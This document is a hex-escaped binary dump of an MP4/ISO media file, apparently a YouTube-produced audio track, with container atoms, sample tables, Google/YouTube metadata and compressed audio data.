\xD6\x00\x00\x00\x70\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x0F\x4D\x00\x00\x27\x20\x00\x00\x39\xD5\x00
\x00\x4F\xCF\x00\x00\x62\xBA\x00\x00\x75\x1D\x00\x00\x87\x37\x00\x00\x9A\x85\x00\x00\xAF\x7B\x00\x00\xC2\x04\x00\x00\xD6
\x7D\x00\x00\xE8\xA2\x00\x00\xFC\x16\x00\x01\x0B\xC2\x00\x01\x1C\x5D\x00\x01\x2B\x87\x00\x01\x3A\x12\x00\x01\x49\x8D\x00
\x01\x56\x5B\x00\x01\x65\x6C\x00\x01\x73\x63\x00\x01\x81\x9E\x00\x01\x95\x8F\x00\x01\xA5\x54\x00\x00\x06\x0D\x74\x72\x61
\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x02\x00\x00\x00\x00\x00
\x00\x19\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x05\xA9\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2
\xCC\x8C\xBA\xF2\x00\x00\x56\x22\x00\x03\xB8\x00\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00
\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69
\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30
\x31\x31\x00\x00\x00\x05\x35\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00
\x00\x00\x01\x00\x00\x04\xF9\x73\x74\x62\x6C\x00\x00\x00\x69\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00
\x59\x6D\x70\x34\x61\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x00\x00\x00\x00\x56
\x22\x00\x00\x00\x00\x00\x35\x65\x73\x64\x73\x00\x00\x00\x00\x03\x27\x00\x00\x00\x04\x1F\x40\x15\x00\x00\xD4\x00\x00\x68
\x50\x00\x00\x5D\xF8\x05\x10\x13\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01\x02\x00\x00\x00\x18
\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xEE\x00\x00\x04\x00\x00\x00\x00\x34\x73\x74\x73\x63\x00\x00
\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x01
\x00\x00\x00\x18\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x03\xCC\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\xEE\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\xD4\x00\x00\x00\xB2\x00\x00\x00\xA4\x00\x00\x00\x91\x00\x00\x00\x90
\x00\x00\x00\x92\x00\x00\x00\x90\x00\x00\x00\x92\x00\x00\x00\x96\x00\x00\x00\x89\x00\x00\x00\x82\x00\x00\x00\x84\x00\x00
\x00\x9A\x00\x00\x00\x8B\x00\x00\x00\x92\x00\x00\x00\x89\x00\x00\x00\x80\x00\x00\x00\x7B\x00\x00\x00\x7E\x00\x00\x00\x87
\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x82\x00\x00\x00\x81\x00\x00\x00\x9D\x00\x00\x00\x9A\x00\x00
\x00\x88\x00\x00\x00\x80\x00\x00\x00\x87\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x85
\x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x8A\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8C\x00\x00
\x00\x8C\x00\x00\x00\x85\x00\x00\x00\x95\x00\x00\x00\x88\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00\x82\x00\x00\x00\x88
\x00\x00\x00\x93\x00\x00\x00\x8A\x00\x00\x00\x92\x00\x00\x00\x86\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x86\x00\x00
\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x89\x00\x00\x00\x89\x00\x00\x00\x88
\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x86\x00\x00\x00\x8E\x00\x00
\x00\x87\x00\x00\x00\x8C\x00\x00\x00\x8C\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x90
\x00\x00\x00\x85\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00
\x00\x8D\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x88\x00\x00\x00\x93\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x84
\x00\x00\x00\x90\x00\x00\x00\x7F\x00\x00\x00\x8A\x00\x00\x00\x90\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00
\x00\x93\x00\x00\x00\x7B\x00\x00\x00\x94\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x95\x00\x00\x00\x8B\x00\x00\x00\x98
\x00\x00\x00\x8F\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x8F\x00\x00\x00\x87\x00\x00\x00\x8B\x00\x00\x00\x90\x00\x00
\x00\x9B\x00\x00\x00\x83\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x84\x00\x00\x00\x8C\x00\x00\x00\x85\x00\x00\x00
\x8E\x00\x00\x00\x95\x00\x00\x00\x92\x00\x00\x00\x8E\x00\x00\x00\x84\x00\x00\x00\x8B\x00\x00\x00\x8A\x00\x00\x00\x89\x00
\x00\x00\x82\x00\x00\x00\x8B\x00\x00\x00\x8B\x00\x00\x00\x86\x00\x00\x00\x8A\x00\x00\x00\x81\x00\x00\x00\x90\x00\x00\x00
\x85\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x93\x00\x00\x00\x91\x00\x00\x00\x85\x00\x00\x00\x81\x00\x00\x00\x81\x00
\x00\x00\x85\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8F\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00\x8F\x00\x00\x00
\x90\x00\x00\x00\x8F\x00\x00\x00\x86\x00\x00\x00\xA1\x00\x00\x00\x89\x00\x00\x00\x8B\x00\x00\x00\x81\x00\x00\x00\x91\x00
\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x92\x00\x00\x00\xAE\x00\x00\x00\x8B\x00\x00\x00\x89\x00\x00\x00\x87\x00\x00\x00
\x8F\x00\x00\x00\x85\x00\x00\x00\x90\x00\x00\x00\x8E\x00\x00\x00\x8E\x00\x00\x00\x8A\x00\x00\x00\x82\x00\x00\x00\x8B\x00
\x00\x00\x86\x00\x00\x00\x8F\x00\x00\x00\x88\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x97\x00\x00\x00\x86\x00\x00\x00
\x85\x00\x00\x00\x8C\x00\x00\x00\x89\x00\x00\x00\x90\x00\x00\x00\x88\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00\x8E\x00
\x00\x00\x87\x00\x00\x00\x7F\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x86\x00\x00\x00\x8D\x00\x00\x00\x90\x00\x00\x00
\x83\x00\x00\x00\x8F\x00\x00\x00\x91\x00\x00\x00\x9A\x00\x00\x00\x88\x00\x00\x00\x89\x00\x00\x00\x84\x00\x00\x00\x8B\x00
\x00\x00\x87\x00\x00\x00\x87\x00\x00\x00\x85\x00\x00\x00\x93\x00\x00\x00\x85\x00\x00\x00\x8C\x00\x00\x00\x99\x00\x00\x00
\x8A\x00\x00\x00\x89\x00\x00\x00\x88\x00\x00\x00\x8A\x00\x00\x00\x8D\x00\x00\x00\x82\x00\x00\x00\x8C\x00\x00\x00\x8B\x00
\x00\x00\x8B\x00\x00\x00\x84\x00\x00\x00\x88\x00\x00\x00\x95\x00\x00\x00\x8D\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00
\x90\x00\x00\x00\x8D\x00\x00\x00\x88\x00\x00\x00\x8E\x00\x00\x00\x91\x00\x00\x00\x98\x00\x00\x00\x88\x00\x00\x00\x70\x73
\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x20\x75\x00\x00\x34\x8D\x00\x00\x4A\x6C\x00\x00\x5D\x6E\x00\x00
\x6F\xB9\x00\x00\x81\xD3\x00\x00\x95\x04\x00\x00\xAA\x08\x00\x00\xBC\x87\x00\x00\xD1\x10\x00\x00\xE3\x23\x00\x00\xF6
\x8C\x00\x01\x06\x59\x00\x01\x17\x06\x00\x01\x26\x33\x00\x01\x34\x91\x00\x01\x43\xFC\x00\x01\x50\xEF\x00\x01\x60\x07\x00
\x01\x6D\xF6\x00\x01\x7C\x33\x00\x01\x90\x1B\x00\x01\x9F\xE9\x00\x01\xAA\x87\x00\x00\x02\xF3\x75\x64\x74\x61\x00\x00\x02
\xEB\x6D\x65\x74\x61\x00\x00\x00\x00\x00\x00\x00\x21\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x6D\x64\x69\x72\x61
\x70\x70\x6C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xBE\x69\x6C\x73\x74\x00\x00\x00\x19\x67\x73\x73\x74\x00\x00
\x00\x11\x64\x61\x74\x61\x00\x00\x00\x01\x00\x00\x00\x00\x30\x00\x00\x00\x1D\x67\x73\x74\x64\x00\x00\x00\x15\x64\x61\x74
\x61\x00\x00\x00\x01\x00\x00\x00\x00\x31\x31\x31\x39\x31\x00\x00\x00\x38\x67\x73\x73\x64\x00\x00\x00\x30\x64\x61\x74\x61
\x00\x00\x00\x01\x00\x00\x00\x00\x42\x42\x43\x35\x44\x41\x45\x30\x37\x48\x48\x31\x33\x34\x39\x33\x37\x31\x38\x39\x31\x39
\x32\x31\x35\x30\x33\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x75\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00\x00\x01
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x6D\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00
\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x18\x67\x73\x68\x68\x00\x00\x01\x10\x64\x61\x74\x61
\x00\x00\x00\x01\x00\x00\x00\x00\x6F\x2D\x6F\x2D\x2D\x2D\x70\x72\x65\x66\x65\x72\x72\x65\x64\x2D\x2D\x2D\x73\x6E\x2D\x61
\x30\x6A\x70\x6D\x2D\x61\x30\x6D\x65\x2D\x2D\x2D\x76\x32\x30\x2D\x2D\x2D\x6C\x73\x63\x61\x63\x68\x65\x37\x2E\x63\x2E\x79
\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x9F\x26\x6D\x64
\x61\x74\x00\x00\x01\xB3\x00\x10\x07\x00\x00\x01\xB6\x10\xC3\x63\x0A\x8D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3
\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF1\x36\xA1\x6E\x1B\x17\x50\x91\x96\xE1\xB1\x73
\xCE\xCB\xD9\xDE\x58\x49\x51\xBA\x59\xA4\xAA\xCF\xA2\x3A\x2E\xD0\x93\x0E\x7C\x6C\x5D\x42\x4A\xD3\x93\x16\xE1\xB1\x75\x09
\x19\x6E\x1B\x17\x3F\x7E\x48\xCB\x70\xD8\x52\xCB\x70\xD8\x53\x9C\xE8\x65\xB8\x6C\x29\xA1\x05\xAE\xF1\x4A\xFC\x52\x8A\xA2
\x44\x8F\x87\xBA\xCD\xB5\x7E\xB4\xB2\x1B\x58\x8F\xE6\xE1\xFB\x5D\x50\xA5\x72\x8D\x42\x26\x82\xDC\x36\x14\xC8\xE0
\x3D\x2D\xE9\xA5\x85\x09\x7C\x8C\xB7\x0D\x8B\x9F\x94\xE1\xB0\xA7\x69\x24\x6A\x70\xD8\x52\xD4\xE1\xB0\xA5\xBE\xCD\xCB\x70
\xD8\x53\x94\xE1\xB0\xA5\xA1\x82\x79\xF9\x1A\x97\x35\x2E\xCF\x92\x35\x2E\x6A\x5C\xF7\x8B\x2A\xDE\x1D\xB9\xB2\x90\xD1
\xFB\x92\x4E\x86\x41\x26\x60\x29\x77\xBE\x6C\x6E\xEA\x0B\x24\xE7\x0D\x10\xC2\x9D\x02\x14\x68\xD9\xF2\xBF\x48\x44\xDC\xB7
\xE0\x42\x8D\x39\x6E\xF4\x6D\x46\x93\x3E\x2F\x63\x37\xD5\xFA\x81\x46\x0F\x7A\x36\x39\x83\xD3\x41\x5C\x97\xC1\x8F\xE1\x06
\x2C\x4F\x7B\xE6\x68\xDA\xFB\x29\x2A\xE1\x33\x0F\x99\x51\x9D\x66\x29\x43\x73\xD0\xED\x4B\x90\xB6\xCF\xA0\x58\x1B\xD0
\xAB\xEE\xB1\xE5\xBE\xDC\xCB\xC4\x57\x64\x58\x51\xF5\xCB\x3E\xB8\x32\x91\xE6\x03\x01\x59\x4A\x27\xF4\x32\x30\x9B\x05
\xEA\x95\xD5\x0D\x5E\xD4\x68\xAC\x0A\x7E\x46\x7F\x1F\x29\xA4\x85\x07\xBE\xD7\x8F\x36\xE5\x8F\x37\xF8\x0B\xCD\x82\xAD\x20
\x73\x69\x47\xB4\x24\x9F\x17\xB1\xF6\xE3\x50\xB7\xB4\xDC\x92\x22\xE9\x39\xB2\xCE\x50\x60\x29\x09\x4B\x3A\x14\xA1\x93\xA8
\x9B\x5C\x18\xA2\x60\x64\x75\x94\x4C\xD2\x49\x8C\x00\xD3\x76\xCE\xB3\x4D\xEF\x2E\xA2\xE9\x04\x88\x0D\x4B\x73\x66\xD9
\xAB\x76\xFF\x5F\xAE\x4C\xCB\x93\x08\x97\xC5\x1A\xF6\x7B\xB3\xD3\x93\xA1\x32\x68\x82\xCA\xDA\x78\x68\x3D\x4A\xCB\x53\xC5
\x96\x4E\xDB\x2A\xD2\x85\x2A\x05\xE6\x44\xB0\xEB\xC0\xAF\x09\xB5\x12\xA3\x04\xC3\xD4\xBF\x57\x26\xB3\x6C\x5D\x62\xA9\x05
\xCE\x0A\x87\x12\x03\x07\x7E\x29\xA1\x93\xFC\x82\x7F\x8C\xCB\xE7\x6D\x0D\x30\x27\x69\x2B\xCE\xDA\x1A\x06\x0F\xB4\x58\x79
\x26\x76\x7C\x35\x3C\x4D\x22\xA5\x09\x4B\x71\x68\x59\xB2\xC1\xA6\x11\x97\x8C\x82\xBE\x05\x04\x1A\x85\x62\x67\x91\x89
\x9B\x69\x63\x7D\xBB\xC7\x9F\xD7\x8F\xB7\xE5\x16\xCD\xD9\x6C\x5B\xF6\xA1\x51\x08\xD6\x8D\xF9\x4F\x31\xAB\x74\xA6\x10\xD7
\x5B\x9B\x97\x3D\xBC\xE0\xD3\x28\xCC\x6F\x1B\x5A\x77\x61\x6C\xE9\x2F\x42\xD4\x56\xCB\x29\x67\xB9\x0B\x32\x76\x2C\xA7\xE7
\x1D\xF2\x55\x39\x3A\xAA\x29\xEA\x0B\xA4\x51\x55\xA6\x1C\x16\x7F\x57\x86\x97\x3D\x71\x3F\x14\x0D\xF7\x92\xF0\x3C\x47\xD1
\x4D\x19\xBE\x1E\x0D\xC7\xD4\x33\x3F\xCD\x57\x7D\xD4\x39\xE7\x15\x6B\xD7\xDB\xFE\xB2\xDB\x65\x50\x3B\x40\xB9\x02\x3F\xF9
\x6C\x5D\xA0\xC2\x9D\x31\x7E\xCE\x6A\x8E\x49\x79\xCE\xFF\x48\x1D\x68\x6C\x5E\xF3\x56\x84\xED\xA1\xB8\x7D\x84\x35\x87\x00
\xAF\xA1\x42\x7B\xBF\xF3\x57\x55\xDC\x5A\x81\x4E\xAD\x01\x36\x37\x6D\x64\xBB\x79\x19\x9A\x20\xF2\x6A\x29\x54\x12\xAC\xA7
\x38\x42\x42\x03\xFF\x57\x13\x02\xD2\x62\x50\xF1\x9D\x6D\xA4\xF7\xDC\x55\x3F\xDE\xDB\x22\x92\x88\x8E\xC3\xE6\x33\x62
\x9E\x67\x49\x49\x85\x6A\xD5\xAB\xA2\x50\x7F\x00\xC3\x2C\x7F\x9F\x44\xBC\xEA\x8E\x9A\x45\xB8\xF3\xE1\x01\xBD\x67\xD7
\xFF\xE7\x54\xEE\x76\x08\xB3\x39\x43\x37\xD5\x5E\xD8\x4C\x56\x5F\x27\xD2\xB6\x41\x50\xD0\x38\xAA\xBC\x57\xFD\x51\x87\xC6
\x8D\xA5\x53\x47\xF6\xAD\xD4\x91\x12\x2E\xE2\x9C\x07\x15\xBA\x97\xD5\xCF\x0B\xD4\x08\x14\x19\x18\x3B\xD4\x29\xCD\x23\x13
\x2A\x24\x77\x35\xB2\x5C\x9C\x19\x3C\x66\x5C\x9C\x41\x1D\xD9\x81\xD7\x98\xF8\xCE\xF7\x3B\x42\x45\x58\xDB\x12\x6F\x8D\xB6
\xE7\x1E\x6F\xFC\x1A\xE4\x31\xBA\x3E\xC3\x41\x26\xC0\xB4\xCA\x79\xAC\x2B\xCF\x2F\x72\xCE\xA9\xD5\xFA\x37\xA1\x22\xE3\xA6
\x76\xB2\xA3\x79\x65\xCE\xA2\x45\xC0\x94\xB0\xE5\x56\xCF\x26\xDD\xC0\x54\x29\x53\xB4\xD4\x0F\x6C\x8B\xD2\x24\xB3\x1A\x61
\xB1\xC4\x61\x46\xA8\xEA\x99\xEC\x93\x61\x26\xAF\x6F\x10\xB9\xAF\x49\x1F\x62\x3D\xB8\x06\xBE\x1E\x4E\xF1\x6B\x86\x10\x67
\x3A\x32\x62\xA8\xA0\xA9\xEA\xC7\x53\x8C\x56\x58\xCF\xE6\xD9\xD8\x36\x13\xAC\x06\xBD\xB7\x94\xB5\x42\x8B\xDE\xFE\xF5
\x4C\x22\x8B\x75\x3F\x66\x28\x67\x9D\xCF\xE7\x37\xB0\xAE\x4D\x46\x4E\x93\x7F\x54\xCE\x28\x46\x6A\xC2\x08\x61\x23
\x1A\x9B\x0A\x94\x37\xB8\x37\x25\x5C\x2A\xF9\xBC\xCF\xB1\xB9\x33\xF3\x2A\x29\x17\x58\x54\x59\x36\x59\x44\xD5\x90\x73\x87
\x8B\x30\x9A\x2A\xD2\xFC\xAB\xCC\x50\x9D\xAC\x05\x45\x9B\xEB\xC2\x85\xF0\x69\xB1\x65\x89\x20\x50\x4B\x7D\x6A\x7B\xF1\x13
\x58\xC6\x38\x87\x14\x6D\xFF\x49\x7B\x56\xE1\x32\x98\x0B\xE1\x9C\x50\x25\x2B\x8A\x7B\x97\x2E\xF8\x93\x2D\xCB\x8E\xE2\x47
\x31\x32\x60\x54\xEB\x61\x9E\x83\x04\x83\x01\xFF\xC7\x09\x1B\x49\x46\xFD\xC2\xC2\x56\x94\xF4\x5C\x14\x1A\x48\x5E\xA1\x37
\x39\xDA\x99\xBC\xDC\x25\xCD\xB7\xB0\xA6\x15\x89\x97\x80\x90\xD9\xA2\xF6\x47\x19\x09\x6F\x06\x68\x1C\x92\x55\x59
\xAA\xBA\xA3\x8D\xC8\xA4\x31\xB0\x95\xC2\x81\xFF\x8B\x53\x6A\x89\xDA\x55\xB0\x6A\x89\x74\xBF\x55\x4B\x51\x95\xE0\xC9\x42
\xD1\xEE\x40\xE0\x97\x6A\x4B\x1E\xB8\x1E\x6B\x8D\xB7\xA1\xB7\x05\xEE\x37\x16\xBC\x13\x30\x81\xFB\x59\xFE\x08\x85\x9B\xA4
\xA3\x7C\x71\xE4\xC6\xDE\x69\x63\x79\xBE\xC5\x6F\x53\xEF\x47\xBD\xB4\x90\x1C\x50\x13\xEC\x47\xF2\x98\x0E\x50\xE4\xFC\x88
\xC9\x68\x61\x1C\xDD\x9C\x6C\xBB\xFF\xFC\xE2\x89\x14\x49\xDD\xA8\x46\x47\xC5\x8C\x2D\xE2\xC6\x7F\x9F\xFC\x45\x64\xDB\x79
\xC4\x3D\x21\x23\x85\x72\x5B\xDC\x2D\xF4\xED\x80\xE3\x47\xD7\xF6\xAA\x0F\xD4\x42\xDD\xD2\xCB\x66\xDD\x59\x44\x88\xB8
\x8D\x4D\x14\x4C\x36\x23\x9F\x51\x93\x33\x2A\xCB\x11\x57\x54\xDD\x2A\x2B\x83\x70\x4C\xD2\xD9\x27\x25\xE0\x62\x14\xC6
\x2D\xBF\xB5\x15\x5D\x74\x76\xA2\x09\xA1\xD6\x13\xA6\xE4\xB2\x48\xA7\x33\x21\x3D\xB4\x06\x5B\xA1\xED\x03\x1B\xCE\x70
\xAB\xF3\x9D\xEF\x44\xF5\x5B\x88\x6E\x42\x45\xDE\x83\x57\x25\x51\x10\xF6\x91\x30\x9F\x82\x92\xFC\x3F\x9F\x35\x13\x17
\xAB\x4C\xD2\xB9\x07\x33\xB7\x38\x0E\x23\x81\x03\xD3\xCA\x0B\x32\x79\x0E\x48\x79\x3C\xD1\x05\x89\xF4\x43\x79\x40\x96
\xDC\x09\x8B\xA0\x3A\x61\xFC\xB4\x37\x0B\x73\x84\x46\x63\x41\xF7\x57\x5B\x7B\xDB\x56\xE5\x88\x86\x27\x69\xAA\xA5\xA9\x41
\xC8\xAD\x81\x31\x6F\xE7\xDB\x97\x16\xCC\xAB\x54\x2F\xD9\x62\x31\x7A\x37\x9D\x07\x7E\xDD\xA2\x76\x21\x03\x01\x7F\x83\x06
\x80\xE2\xB3\x11\x32\xF8\x73\x95\x6B\xEF\xF3\x4A\x17\x17\x3F\x04\x00\x64\x7A\x0C\x0A\xE0\x71\x59
\x8F\x8D\xBC\xED\x8A\xDB\xA7\xF9\x45\x9F\x52\xFF\x94\x8A\xE3\x87\xD5\xE8\xA8\x5A\xD7\xB0\x8B\x49\x4D\xD2\x3D\x67\x4E\x50
\xE3\x09\x41\x1D\xEF\x13\x5C\x3D\x1C\xB4\xDB\x7B\xCA\x59\xE8\x38\xB1\x7D\xA2\x28\x79\x16\xF6\x53\x74\xF0\xBF\xD7\x2F\x87
\x39\xEE\x6D\xEA\xC3\x6D\x59\x00\x2F\x82\xA0\x2A\x93\x01\x00\x70\x7A\xD8\x3E\x6F\xFF\x7E\x0F\x12\x62\x2F\x55\xCD\xB2
\xAE\x83\x94\xB6\xFC\xEA\xB6\x6E\x07\xBC\x06\x47\x7B\xE9\xBC\xF1\x28\xC0\x6B\x12\x72\xD2\xAF\xE0\x6A\xA2\xEC\x86\xD6
\xBB\x0E\xA7\x89\x98\xC1\xB6\x22\xC9\x83\x7F\x8D\xA2\x28\xB9\x9C\x1F\x35\xDB\x54\x23\x9C\xAB\xEA\x21\xAC\x3A\xE7\x85\xE5
\xB3\x30\x73\x38\x88\x40\xE8\xCD\x4C\x0A\xD2\xE7\x2F\x60\xD3\x87\xCC\x07\x02\xFD\x09\x70\x80\xD1\xA0\x76\xE8\x4B\xA8\xB6
\x79\x50\xAD\x4D\x11\xBE\x1E\x82\xCC\x34\x14\xD5\x61\xAD\x9C\xB9\xD9\x49\x68\x4A\xF9\x70\xD6\x34\x38\x2C\xC1\xB4\xB4\x63
\x75\x48\x52\xB6\xF7\x77\x99\x20\x9E\xA2\xA6\x31\x16\x0B\xF4\x25\xC1\xF3\x5D\xEA\x85\xCA\x74\x25\x66\x5F\x8B\xA3\x15\x54
\x8B\x1E\x51\x8B\xA3\x7A\x50\x59\x86\x85\xEF\xA1\xC7\x91\xF0\x5F\xA1\x2C\x4B\x0A\x2A\xD3\x34\x97\x14\x37\x16\xEF\x4D\x51
\x8C\x5C\xF3\x61\x23\x0A\x80\xB7\xA6\x2D\xCE\xAF\xDE\x14\xDB\x5F\x8B\x30\xD0\xBE\x84\xB4\x20\x34\x6A\x83\x0C\x5B\xE0\xC1
\x49\xE4\x71\x4C\xDC\x96\x61\xA1\x7B\xD9\x66\x1A\x17\xBF\x82\xB1\xA9\x37\xAA\x56\xE2\x8D\xB8\x0B\x12\x8B\x08\x99\x66
\x1A\x0A\x59\x66\x1A\x17\xBF\xE9\x89\x65\x98\x68\x29\x65\x98\x68\x29\xA9\x4F\x96\x59\x86\x82\x96\xA3\x0D\x05\x33
\x8C\xAB\x6D\x64\x6D\xB7\x97\x1B\x6D\xFC\x6D\xB7\x78\xDB\x6E\x71\xB6\xDF\xC6\xDB\x7F\x1B\x6D\xFC\x6D\xB7\xF1\xB6\xDF\xC6
\xDB\x73\x7F\x00\x00\x01\xB6\x51\xE2\x07\xFF\xB8\xAE\x0A\x72\x5C\x7C\xB3\x61\xAF\x28\x8A\x47\xA6\x5D\x77\x2E\x56\x38\xF8
\xE3\x17\x2B\x95\xD5\x85\x24\x7C\xBF\xCB\xE5\xE5\x55\x7D\x8C\x56\xFB\xEE\xAE\x5F\x75\x7D\xF2\x5F\x3B\xA5\x0B\xBD\x3D\x36
\x2D\x47\x14\xD9\x76\x6D\xA5\x26\xF7\xC5\xEF\xF7\x49\xF7\xDA\xF5\xA7\x92\xE9\x2B\xFE\xC6\xAC\x4F\xF2\x81\x6A\xD8\xD8
\xEF\x4B\x05\x64\x27\xBA\x8D\x64\x25\x75\xE1\x80\x84\x2C\x2A\x68\xFD\x06\x27\x09\x77\x97\x16\xD7\x6E\xD1\x69\xA9\xD0\x49
\xD7\x9B\x3F\xCB\xFC\x9B\xB6\x56\xFA\x1A\x90\x11\x14\xFD\x67\x21\xE5\x5F\x57\x15\x0F\x35\xAF\xD5\x04\x3A\x75\x29\x4B\xC4
